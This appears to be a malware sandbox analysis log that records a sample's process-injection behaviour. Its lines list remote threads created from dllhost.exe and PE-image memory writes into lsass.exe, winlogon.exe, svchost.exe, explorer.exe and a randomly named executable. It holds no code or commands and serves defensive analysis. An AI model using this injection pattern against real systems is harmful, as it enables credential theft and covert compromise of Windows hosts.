Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 167A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 167D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23BC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23BF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 81C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A5E72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A5EA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 17762EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 186A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\wbem\WMIADAP.exe EIP: 52A12EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\wbem\WMIADAP.exe EIP: 52A12EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 56425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 34D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D0DE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F0B92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D0F72EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\Conhost.exe EIP: 3D02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 36152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 50472EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FB052EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FB052EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\Conhost.exe EIP: E5672EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FD322EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C8FA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CB042EBC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAED90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADECD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B47B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20870060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E29CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 9070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E29CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 9070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2045C3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23023330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A71C3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B6BA880000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1FA5FEF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2694B1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2E0060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B6BA880000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1FA5FEF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2694B1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2E0060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E90000 value starts with: 4D5A
